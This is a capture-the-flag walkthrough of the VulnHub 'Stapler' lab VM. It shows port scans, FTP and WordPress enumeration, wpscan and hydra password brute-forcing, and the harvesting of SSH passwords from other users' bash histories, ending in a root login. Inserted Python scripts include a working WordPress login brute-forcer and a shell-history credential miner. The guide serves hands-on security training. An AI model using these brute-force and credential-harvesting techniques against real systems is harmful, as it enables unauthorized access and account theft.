Stapler
He110 w0rld! Today I will be sharing a guide to completing the Stapler VM hosted on VulnHub. This VM was created by the one and only @g0tmi1k.
As always, there are spoilers in this guide, so use as little or as much of it as you need.
***With all these VMs there are always multiple ways to r00t the box***
+---------------------------------------------------------+
| |
| __..--''\ |
| __..--'' \ |
| __..--'' __..--'' |
| __..--'' __..--'' | |
| \ o __..--''____....----"" |
| \__..--''\ |
| | \ |
| +----------------------------------+ |
| +----------------------------------+ |
| |
+- - - - - - - - - - - - - -|- - - - - - - - - - - - - - -+
| Name: Stapler | IP: DHCP |
| Date: 2016-June-08 | Goal: Get Root! |
| Author: g0tmi1k | Difficultly: ??? ;) |
+- - - - - - - - - - - - - -|- - - - - - - - - - - - - - -+
| |
| + Average beginner/intermediate VM, only a few twists |
| + May find it easy/hard (depends on YOUR background) |
| + ...also which way you attack the box |
| |
| + It SHOULD work on both VMware and Virtualbox |
| + REBOOT the VM if you CHANGE network modes |
| + Fusion users, you'll need to retry when importing |
| |
| + There are multiple methods to-do this machine |
| + At least two (2) paths to get a limited shell |
| + At least three (3) ways to get a root access |
| |
| + Made for BsidesLondon 2016 |
| + Slides: https://download.vulnhub.com/media/stapler/ |
| |
| + Thanks g0tmi1k, nullmode, rasta_mouse & superkojiman |
| + ...and shout-outs to the VulnHub-CTF Team =) |
| |
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - -+
| |
| --[[~~Enjoy. Have fun. Happy Hacking.~~]]-- |
| |
+---------------------------------------------------------+
Let's reap some bytes...
Discovery
Command: netdiscover -r 192.168.153.0/24
***Please note your IP range can/will differ***
Currently scanning: 192.168.153.0/24   |   Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
_____________________________________________________________________________
  IP              At MAC Address      Count  Len  MAC Vendor / Hostname
-----------------------------------------------------------------------------
  192.168.153.1   00:50:56:c0:00:01   1      60   VMware, Inc.
  192.168.153.142 00:0c:29:8b:3c:14   1      60   VMware, Inc.
  192.168.153.254 00:50:56:f8:e3:7b   1      60   VMware, Inc.
Enumeration
Command: nmap -sS -Pn -p1-65535 192.168.153.142
root@lulb0x:~# nmap -sS -Pn -p1-65535 192.168.153.142
Starting Nmap 7.12 ( https://nmap.org ) at 2016-06-24 15:26 EDT
Nmap scan report for Red.Initech (192.168.153.142)
Host is up (0.00023s latency).
Not shown: 65523 filtered ports
PORT      STATE  SERVICE
20/tcp    closed ftp-data
21/tcp    open   ftp
22/tcp    open   ssh
53/tcp    open   domain
80/tcp    open   http
123/tcp   closed ntp
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn
666/tcp   open   doom
3306/tcp  open   mysql
12380/tcp open   unknown
MAC Address: 00:0C:29:8B:3C:14 (VMware)
Service Exploration
FTP
root@lulb0x:~# ftp 192.168.153.142
Connected to 192.168.153.142.
220-
220-|-----------------------------------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|-----------------------------------------------------------------------------------------|
220-
220
Name (192.168.153.142:root): Anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0             107 Jun 03 23:06 note
226 Directory send OK.
ftp> get note
local: note remote: note
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note (107 bytes).
226 Transfer complete.
107 bytes received in 0.00 secs (50.0442 kB/s)
ftp> exit
Interesting: anonymous login works, and the banner names a potential user, Harry. I will add him to the list of potential users. Reading our loot (note) reveals...
root@lulb0x:~# cat note
Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.
SSH
Usually there is nothing to gain from trying to SSH at this point, but I always connect just to see whether the banner (assuming there is one) has any hints we can put away for later.
root@lulb0x:~# ssh 192.168.153.142
-----------------------------------------------------------------
~ Barry, don't forget to put a message here ~
-----------------------------------------------------------------
root@192.168.153.142's password:
Another name for the list: Barry.
666 - The port of the beast!!!
root@lulb0x:~# nc 192.168.153.142 666
PK d��Hp� ��, 2
message2.jpgUT +�QWJ�QWux
� �z
T ���P���A@� �UT�T � 2>��RDK �Jj�"DL[E�
0<Ĵ�ʮn���V �W�H �
The service just dumps a file at us. The PK header and the embedded filename message2.jpg give it away as a zip archive, so save it to disk and let file confirm.
Command: nc 192.168.153.142 666 > Satanic_File
root@lulb0x:~/Documents/Stapler/Satans_Port# file Satanic_File
Satanic_File: Zip archive data, at least v2.0 to extract
Command: unzip Satanic_File
root@lulb0x:~/Documents/Stapler/Satans_Port# unzip Satanic_File.zip
Archive:  Satanic_File.zip
  inflating: message2.jpg
Viewing message2.jpg gives us yet another potential user: scott.
Now, I have been burned a couple of times in these VMs by not checking the JPEGs for hidden messages, so I always run strings on the images.
Command: strings message2.jpg
JFIF
vPhotoshop 3.0
8BIM
1If you are reading this, you should get a cookie!
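As an added example (my own code, not from the walkthrough or the VM author), here is the same triage in Python: sniff the magic bytes of whatever a port throws at you, unpack it if it is a zip (refusing member paths that would escape the working directory), and run a strings(1) equivalent over each member. The sample blob is a constructed stand-in for the real archive, and grab_port() is the piece you would point at 192.168.153.142:666 on the actual box.

```python
import io
import socket
import zipfile

# Constructed stand-in for what port 666 dumps: a zip holding one "JPEG"
# that carries a plain-text note. Not the real archive from the VM.
JPEG_NOTE = b"If you are reading this, you should get a cookie!"


def build_sample_blob():
    fake_jpeg = (b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01" + b"\x00" * 16
                 + JPEG_NOTE + b"\xff\xd9")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("message2.jpg", fake_jpeg)
    return buf.getvalue()


# (magic bytes, type) in the order file(1) would be happy with for these.
MAGIC = [
    (b"PK\x03\x04", "zip"),
    (b"\xff\xd8\xff", "jpeg"),
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"\x7fELF", "elf"),
    (b"%PDF", "pdf"),
    (b"\x1f\x8b", "gzip"),
]


def identify(data):
    for magic, name in MAGIC:
        if data.startswith(magic):
            return name
    return "unknown"


def grab_port(host, port, timeout=5):
    """Read everything a service writes until it closes (same as nc host port > file)."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        while True:
            chunk = s.recv(65536)
            if not chunk:
                break
            chunks.append(chunk)
    return b"".join(chunks)


def extract_zip(data):
    """Return {member name: bytes}; skip absolute or parent-directory paths (zip-slip)."""
    out = {}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for info in z.infolist():
            if info.filename.startswith("/") or ".." in info.filename.split("/"):
                continue  # never let loot write outside the working directory
            out[info.filename] = z.read(info)
    return out


def printable_strings(data, min_len=4):
    """strings(1) equivalent: runs of printable ASCII at least min_len long."""
    out, run = [], bytearray()
    for b in data:
        if 32 <= b < 127:
            run.append(b)
        else:
            if len(run) >= min_len:
                out.append(run.decode("ascii"))
            run = bytearray()
    if len(run) >= min_len:
        out.append(run.decode("ascii"))
    return out


def triage_blob(data):
    """Identify the blob, unpack it if it is a zip, and list the strings in each member."""
    kind = identify(data)
    members = extract_zip(data) if kind == "zip" else {"blob": data}
    return kind, {name: printable_strings(body) for name, body in members.items()}


if __name__ == "__main__":
    # On the real box: kind, found = triage_blob(grab_port("192.168.153.142", 666))
    kind, found = triage_blob(build_sample_blob())
    print(kind)
    for name, strs in found.items():
        print(name, strs)
```

file and strings do the same job one at a time; having it in one script means the next port that dumps a binary at you gets the same treatment without guessing.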
Port 12380
Figuring out what port 12380 holds with netcat was pretty simple: it answers with a web page. Interesting: the page lists three more people's names:
dave
tim
zoe
Port 80 / 12380 : HTTP(S?)
Since we know 12380 turned out to be a website, we can now run nikto and dirb/dirbuster against both web ports.
Command: nikto -host 192.168.153.142; dirb http://192.168.153.142
root@lulb0x:~/Documents/Stapler# nikto -host 192.168.153.142; dirb http://192.168.153.142
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.153.142
+ Target Hostname:    192.168.153.142
+ Target Port:        80
+ Start Time:         2016-06-27 10:56:46 (GMT-4)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3093: /.bashrc: User home dir was found with a shell rc file. This may reveal file and path information.
+ OSVDB-3093: /.profile: User home dir with a shell profile was found. May reveal directory information and system configuration.
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated: 20 error(s) and 5 item(s) reported on remote host
+ End Time:           2016-06-27 10:56:58 (GMT-4) (12 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Jun 27 10:56:58 2016
URL_BASE: http://192.168.153.142/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.153.142/ ----
+ http://192.168.153.142/.bashrc (CODE:200|SIZE:3771)
+ http://192.168.153.142/.profile (CODE:200|SIZE:675)
-----------------
END_TIME: Mon Jun 27 10:57:02 2016
DOWNLOADED: 4612 - FOUND: 2
Port 80 only coughed up .bashrc and .profile, which says the document root is somebody's home directory but is hardly earth-shattering awesome sauce, so I moved on to 12380.
Command: nikto -host 192.168.153.142 -port 12380
root@lulb0x:~/Documents/Stapler# nikto -host 192.168.153.142 -port 12380;
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.153.142
+ Target Hostname:    192.168.153.142
+ Target Port:        12380
---------------------------------------------------------------------------
+ SSL Info:        Subject:  /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here? /O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
                   Ciphers:  ECDHE-RSA-AES256-GCM-SHA384
                   Issuer:   /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here? /O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
+ Start Time:         2016-06-27 11:01:00 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x15 0x5347c53a972d1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'dave' found, with contents: Soemthing doesn't look right here
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Hostname '192.168.153.142' does not match certificate's names: Red.Initech
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 7690 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time:           2016-06-27 11:02:40 (GMT-4) (100 seconds)
So we get an SSL cert, and from its emailAddress another user: pam. The odd 'dave' response header is a name we already have, and there is a phpMyAdmin directory to remember for later.
Also, robots.txt gives us two folders:
admin112233
blogblog (potentially a CMS). Nice.
Navigating to https://192.168.153.142:12380/admin112233 leads nowhere useful (did you get caught? :) )
Moving on...
blogblog reveals itself as a WordPress site. Sweet. If we get a credential, hopefully we can edit a theme and drop a reverse shell or otherwise get RCE.
For this next part I am going to use wpscan to find everything of value. (If you are looking for another awesome tutorial, a video one, check out https://7ms.us; Brian does a great job of explaining which flags to use for wpscan. Thanks Brian @7minsec.)
Command: wpscan --url https://192.168.153.142:12380/blogblog/ -e u[1-20] -e a
_______________________________________________________________
WordPress Security Scanner by the WPScan Team
Version 2.9.1
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________
[+] URL: https://192.168.153.142:12380/blogblog/
[+] Started: Mon Jun 27 11:17:31 2016
[!] The WordPress 'https://192.168.153.142:12380/blogblog/readme.html' file exists exposing a version number
[+] Interesting header: DAVE: Soemthing doesn't look right here
[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)
[!] Registration is enabled: https://192.168.153.142:12380/blogblog/wp-login.php?action=register
[+] XML-RPC Interface available under: https://192.168.153.142:12380/blogblog/xmlrpc.php
[!] Upload directory has directory listing enabled: https://192.168.153.142:12380/blogblog/wp-content/uploads/
[!] Includes directory has directory listing enabled: https://192.168.153.142:12380/blogblog/wp-includes/
[+] WordPress version 4.2.1 identified from advanced fingerprinting (Released on 2015-04-27)
[!] 21 vulnerabilities identified from the version number
[+] Enumerating usernames ...
[+] Identified the following 16 user/s:
+----+---------+-----------------+
| Id | Login   | Name            |
+----+---------+-----------------+
| 1  | john    | John Smith      |
| 2  | elly    | Elly Jones      |
| 3  | peter   | Peter Parker    |
| 4  | barry   | Barry Atkins    |
| 5  | heather | Heather Neville |
| 6  | garry   | garry           |
| 7  | harry   | harry           |
| 8  | scott   | scott           |
| 9  | kathy   | kathy           |
| 10 | tim     | tim             |
| 11 | zoe     | ZOE             |
| 12 | dave    | Dave            |
| 13 | simon   | Simon           |
| 14 | abby    | Abby            |
| 15 | vicki   | Vicki           |
| 16 | pam     | Pam             |
+----+---------+-----------------+
Names to keep on the list:
pam
dave
zoe
tim
garry
harry
barry
peter
john
elly
I remember seeing a message for elly stating that there was a payload waiting for her in her FTP account... or something like that. Let's see if wpscan can brute-force her password.
Command: wpscan --url https://192.168.153.142:12380/blogblog/ --wordlist /usr/share/wordlists/rockyou_5max.txt --username elly
****NOTE: rockyou_5max.txt is just the rockyou list filtered down to the words of 5 characters or fewer.****
****NOTE v2.0: I also wrote a brute-forcer in Python for finding the password; as a codemonkey I feel the need to always try on my own. If anyone wants it, feel free to leave a comment and I can share it with you.****
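As an added example written for this guide (my own sketch, not the author's Python brute-forcer mentioned in the note above), here is the shape such a tool takes: build the shrunken wordlist the same way (5 characters max), try guesses derived from the username first, and judge each wp-login.php attempt by what WordPress actually does on success, a 302 plus a wordpress_logged_in_ cookie, rather than by string-matching the page. Host, port, path and the rockyou location are assumptions for this lab; certificate verification is switched off on purpose because the box uses a self-signed cert.

```python
import http.client
import ssl
import urllib.parse


def shrink_wordlist(words, max_len=5):
    """rockyou_5max equivalent: keep candidates of max_len chars or fewer, de-duplicated, order kept."""
    seen, out = set(), []
    for w in words:
        w = w.rstrip("\r\n")
        if w and len(w) <= max_len and w not in seen:
            seen.add(w)
            out.append(w)
    return out


def username_candidates(user):
    """Passwords derived from the login itself; cheap enough to try before any big list."""
    u = user.lower()
    bases = [u, u[::-1], u.capitalize(), u[::-1].capitalize(), u.upper(), u + u]
    suffixes = ["", "1", "123", "!", "2016"]
    out = []
    for b in bases:
        for s in suffixes:
            cand = b + s
            if cand not in out:
                out.append(cand)
    return out


def wp_login_ok(host, port, path, user, password):
    """One POST to wp-login.php. A good login answers 302 with a wordpress_logged_in_*
    cookie; a bad one answers 200 with the login form again."""
    ctx = ssl._create_unverified_context()  # lab box, self-signed cert (assumption)
    body = urllib.parse.urlencode({
        "log": user, "pwd": password, "wp-submit": "Log In",
        "redirect_to": path + "wp-admin/", "testcookie": "1",
    })
    conn = http.client.HTTPSConnection(host, port, context=ctx, timeout=10)
    conn.request("POST", path + "wp-login.php", body, {
        "Content-Type": "application/x-www-form-urlencoded",
        "Cookie": "wordpress_test_cookie=WP+Cookie+check",
    })
    resp = conn.getresponse()
    resp.read()
    cookies = resp.headers.get_all("Set-Cookie") or []
    conn.close()
    return resp.status == 302 and any(c.startswith("wordpress_logged_in_") for c in cookies)


def brute(host, port, path, user, wordlist, max_len=5):
    """Username-derived guesses first, then the shrunken wordlist; returns the hit or None."""
    for pw in username_candidates(user) + shrink_wordlist(wordlist, max_len):
        if wp_login_ok(host, port, path, user, pw):
            return pw
    return None


if __name__ == "__main__":
    # Assumed lab target and wordlist path; adjust for your own range.
    with open("/usr/share/wordlists/rockyou.txt", encoding="latin-1") as f:
        print(brute("192.168.153.142", 12380, "/blogblog/", "elly", f))
```

Against this box the username-derived pass finds ylle on the second guess, which is the point: the 18-minute wordlist run is the fallback, not the first move.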
[+] Enumerating plugins from passive detection ...
[+] No plugins found
[+] Starting the password brute forcer
[+] [SUCCESS] Login : elly Password : ylle
Brute Forcing 'elly' Time: 00:18:01
+----+-------+------+----------+
| Id | Login | Name | Password |
+----+-------+------+----------+
|    | elly  |      | ylle     |
+----+-------+------+----------+
[+] Finished: Mon Jun 27 11:46:55 2016
[+] Requests Done: 99717
[+] Memory used: 42.395 MB
[+] Elapsed time: 00:18:04
Ooh... elly was cracked: her password is ylle, her username backwards.
Let's switch back and try her credentials on the FTP service to see if we get lucky with some password reuse.
root@lulb0x:~/Documents/Stapler# ftp 192.168.153.142
Connected to 192.168.153.142.
220-
220-|-----------------------------------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|-----------------------------------------------------------------------------------------|
220-
220
Name (192.168.153.142:root): elly
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
Bingo... but what can we see?
Command: ls
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    5 0        0            4096 Jun 03 13:51 X11
drwxr-xr-x    3 0        0            4096 Jun 03 13:51 acpi
-rw-r--r--    1 0        0            3028 Apr 20 23:09 adduser.conf
-rw-r--r--    1 0        0              51 Jun 03 19:20 aliases
-rw-r--r--    1 0        0           12288 Jun 03 19:20 aliases.db
drwxr-xr-x    2 0        0            4096 Jun 07 01:57 alternatives
drwxr-xr-x    8 0        0            4096 Jun 03 17:46 apache2
drwxr-xr-x    3 0        0            4096 Jun 03 13:51 apparmor
drwxr-xr-x    9 0        0            4096 Jun 06 23:17 apparmor.d
drwxr-xr-x    3 0        0            4096 Jun 03 13:51 apport
drwxr-xr-x    6 0        0            4096 Jun 03 14:05 apt
-rw-r-----    1 0        1             144 Jan 14 23:35 at.deny
drwxr-xr-x    5 0        0            4096 Jun 03 14:47 authbind
-rw-r--r--    1 0        0            2188 Sep 01  2015 bash.bashrc
drwxr-xr-x    2 0        0            4096 Jun 03 13:52 bash_completion.d
-rw-r--r--    1 0        0             367 Jan 27 15:17 bindresvport.blacklist
drwxr-xr-x    2 0        0            4096 Apr 12 11:30 binfmt.d
drwxr-xr-x    2 0        0            4096 Jun 03 13:51 byobu
drwxr-xr-x    3 0        0            4096 Jun 03 13:51 ca-certificates
-rw-r--r--    1 0        0            7788 Jun 03 13:51 ca-certificates.conf
drwxr-xr-x    2 0        0            4096 Jun 03 13:49 console-setup
drwxr-xr-x    2 0        0            4096 Jun 03 19:13 cron.d
drwxr-xr-x    2 0        0            4096 Jun 03 17:07 cron.daily
drwxr-xr-x    2 0        0            4096 Jun 03 13:49 cron.hourly
drwxr-xr-x    2 0        0            4096 Jun 03 13:49 cron.monthly
drwxr-xr-x    2 0        0            4096 Jun 03 13:51 cron.weekly
-rw-r--r--    1 0        0             722 Apr 05 22:59 crontab
-rw-r--r--    1 0        0              54 Jun 03 13:51 crypttab
drwxr-xr-x    2 0        0            4096 Jun 04 00:02 dbconfig-common
drwxr-xr-x    4 0        0            4096 Jun 03 13:51 dbus-1
-rw-r--r--    1 0        0            2969 Nov 10  2015 debconf.conf
-rw-r--r--    1 0        0              12 Apr 30  2015 debian_version
drwxr-xr-x    3 0        0            4096 Jun 05 23:04 default
-rw-r--r--    1 0        0             604 Jul 02  2015 deluser.conf
drwxr-xr-x    2 0        0            4096 Jun 03 13:49 depmod.d
drwxr-xr-x    4 0        0            4096 Jun 03 13:49 dhcp
-rw-r--r--    1 0        0           26716 Jul 30  2015 dnsmasq.conf
drwxr-xr-x    2 0        0            4096 Jun 03 14:19 dnsmasq.d
drwxr-xr-x    4 0        0            4096 Jun 07 01:57 dpkg
-rw-r--r--    1 0        0              96 Apr 20 23:09 environment
drwxr-xr-x    4 0        0            4096 Jun 03 14:18 fonts
-rw-r--r--    1 0        0             594 Jun 03 13:49 fstab
Elly's FTP directory is /etc. Lulz. Let's grab the passwd file and see whether any of our potential users are actual accounts on the box.
Command: get passwd
ftp> get passwd
local: passwd remote: passwd
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for passwd (2908 bytes).
226 Transfer complete.
2908 bytes received in 0.00 secs (6.6826 MB/s)
Filtering passwd down to the accounts with a real login shell gives us 19 users to try:
RNunemaker
ETollefson
DSwanger
AParnell
SHayslett
MBassin
JBare
LSolum
MFrei
SStroud
JKanode
CJoo
Drew
jess
SHAY
mel
zoe
NATHAN
elly
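The list above was pulled out of passwd by eye. As an added example (not from the walkthrough), here is the filter as a script: keep the accounts whose shell is interactive and whose uid is in the human range, and write them out one per line as the -L file for hydra. The passwd lines are constructed for the example and are not the VM's real file.

```python
# Constructed sample in /etc/passwd format (not the VM's real file).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:111:118:MySQL Server,,,:/nonexistent:/bin/false
RNunemaker:x:1000:1000::/home/RNunemaker:/bin/bash
jess:x:1010:1010::/home/jess:/bin/bash
zoe:x:1015:1015::/home/zoe:/bin/bash
elly:x:1018:1018::/home/elly:/bin/bash
ftp:x:112:120:ftp daemon,,,:/srv/ftp:/bin/false
"""

# Shells that exist precisely so the account cannot log in.
NOLOGIN = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/usr/bin/false"}


def parse_passwd(text):
    """Turn passwd text into dicts; malformed lines are skipped rather than crashing the run."""
    rows = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != 7:
            continue
        login, _pw, uid, gid, gecos, home, shell = parts
        rows.append({"login": login, "uid": int(uid), "gid": int(gid),
                     "gecos": gecos, "home": home, "shell": shell})
    return rows


def real_users(text, min_uid=1000, include_root=False):
    """Accounts that can actually log in: interactive shell plus a human uid (1000+ on Debian/Ubuntu)."""
    out = []
    for r in parse_passwd(text):
        if r["shell"] in NOLOGIN:
            continue
        if r["uid"] >= min_uid or (include_root and r["uid"] == 0):
            out.append(r["login"])
    return out


def write_userlist(text, path):
    """Write the login names one per line, the format hydra -L expects; returns the list."""
    users = real_users(text)
    with open(path, "w") as f:
        f.write("\n".join(users) + "\n")
    return users


if __name__ == "__main__":
    # On the real box: write_userlist(open("passwd").read(), "Actual_Users")
    print(write_userlist(SAMPLE_PASSWD, "Actual_Users"))
```

The uid cut-off is the Debian/Ubuntu convention; on other distributions check login.defs for UID_MIN before trusting it.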
Okay, time to let hydra do what it does best. The -u flag loops over all the users for each password rather than all the passwords for each user, which is what you want with 19 logins and a huge list; note hydra's own warning below that sshd limits parallel sessions, so -t 4 is the safer setting.
Command: hydra -L Actual_Users -P /usr/share/wordlists/rockyou.txt ssh://192.168.153.142 -t 15 -u
root@lulb0x:~/Documents/Stapler# hydra -L Actual_Users -P /usr/share/wordlists/rockyou.txt ssh://192.168.153.142 -t 15 -u
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-27 13:19:14
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 15 tasks per 1 server, overall 64 tasks, 272543581 login tries (l:19/p:14344399), ~283899 tries per task
[DATA] attacking service ssh on port 22
[STATUS] 162.00 tries/min, 162 tries in 00:01h, 272543419 todo in 28039:27h, 15 active
[22][ssh] host: 192.168.153.142   login: Drew   password: qwerty
[STATUS] 203.67 tries/min, 611 tries in 00:03h, 272542970 todo in 22303:02h, 15 active
[22][ssh] host: 192.168.153.142   login: JBare   password: cookie
Two SSH logins in three minutes. Trying to cut some corners: since it seems all the home folders are world-readable, let's dump every user's bash history from JBare's shell.
Command: cat */.bash_history
JBare@red:/home$ cat */.bash_history
exit
free
exit
exit
exit
exit
exit
exit
exit
exit
top
ps aux
exit
exit
exit
id
whoami
ls -lah
pwd
ps aux
sshpass -p thisimypassword ssh JKanode@localhost
apt-get install sshpass
sshpass -p JZQuyIN5 peter@localhost
ps -ef
top
kill -9 3747
exit
exit
exit
exit
exit
whoami
exit
exit
exit
exit
exit
cat: peter/.bash_history: Permission denied
exit
exit
exit
exit
exit
exit
id
top
exit
JKanode:thisimypassword
peter:JZQuyIN5
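Both credentials come from sshpass lines in other users' history, which is a pattern worth automating. As an added example (not from the walkthrough), here is a small miner that greps history text for the sshpass, mysql -p and curl/wget -u forms. The sample history is constructed, modelled on the lines above plus a couple of invented mysql/curl lines, and is not the VM's real file. Note that the second sshpass line has no "ssh" between the password and user@host, so the pattern treats that word as optional.

```python
import re

# Constructed history lines (modelled on the walkthrough, not the VM's real files).
SAMPLE_HISTORY = """\
exit
ps aux
sshpass -p thisimypassword ssh JKanode@localhost
apt-get install sshpass
sshpass -p JZQuyIN5 peter@localhost
mysql -u root -pS3cretDbPw wordpress
curl -u dave:hunter2 https://red.initech:12380/admin112233/
echo "export PASS=abc" >> ~/.profile
kill -9 3747
"""

PATTERNS = [
    # sshpass -p <pw> [ssh] <user>@<host>; the ssh word is optional (see the peter line)
    ("sshpass", re.compile(r"sshpass\s+-p\s*(\S+)\s+(?:\S+\s+)*?([\w.-]+)@\S+")),
    # mysql -u <user> -p<pw>; mysql glues the password to -p, a bare -p means prompt
    ("mysql", re.compile(r"mysql\b.*?-u\s*([\w.-]+).*?-p(\S+)")),
    # curl/wget -u user:pass or --user user:pass
    ("basic-auth", re.compile(r"(?:curl|wget)\b.*?(?:-u|--user)\s+([^\s:]+):(\S+)")),
]


def find_credentials(history_text):
    """Return (user, password, source) triples found in shell history lines, de-duplicated."""
    found = []
    for line in history_text.splitlines():
        for name, rx in PATTERNS:
            m = rx.search(line)
            if not m:
                continue
            if name == "sshpass":
                pw, user = m.group(1), m.group(2)   # sshpass puts the password first
            else:
                user, pw = m.group(1), m.group(2)
            trip = (user, pw, name)
            if trip not in found:
                found.append(trip)
    return found


if __name__ == "__main__":
    # On the box: find_credentials(open("/home/JKanode/.bash_history").read())
    for user, pw, src in find_credentials(SAMPLE_HISTORY):
        print(f"{user}:{pw}  ({src})")
```

On the defending side the fix is to keep secrets off the command line in the first place: sshpass -e or -f and mysql --defaults-extra-file do that, while an ignorespace HISTCONTROL only hides the line from history, not from ps.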
I am going to try Peter's credentials first because he has the stronger password... I would like to believe he is a sudoer at a minimum.
Jackpot... peter has full sudo rights (sudo -l confirms it), so a sudo su gets us root and we claim our flag.
I would like to thank g0tmi1k, VulnHub and all the testers. This was a very fun VM.